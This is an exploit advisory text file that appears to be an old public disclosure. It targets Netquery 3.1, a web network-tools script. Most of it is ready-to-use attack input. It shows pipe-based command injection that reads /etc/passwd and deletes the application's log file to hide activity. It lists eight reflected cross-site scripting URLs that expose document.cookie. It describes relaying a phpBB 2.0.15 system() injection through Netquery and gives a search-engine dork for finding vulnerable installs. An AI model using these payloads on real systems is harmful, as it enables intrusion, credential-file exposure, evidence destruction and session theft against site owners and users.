netquery31.txt

`Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit  
  
software:  
author site: http://www.virtech.org/tools/  
  
a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on   
"Ping IP Address or Host Name" input text box, example:  
  
| cat /etc/passwd  
  
then you will see plain text password file   
  
| pwd   
  
to see current path  
  
| rm [pwd_output]/logs/nq_log.txt  
  
to delete log file...  
  
disclosure of user activity:  
if enabled, a user can view clear text log file through url:  
  
http://[target]/[path]/logs/nq_log.txt  
  
xss:  
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>  
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>  
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>  
  
  
a user can use on-line Netquery installations like proxy servers  
to launch exploit from HTTP GET request panel, example:  
exploiting Phpbb 2.0.15:  
make a get request of  
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd  
  
googledork: inurl:nquser.php  
  
  
rgod  
email: rgod[at]autistici.org  
site: http://rgod.altervista.org`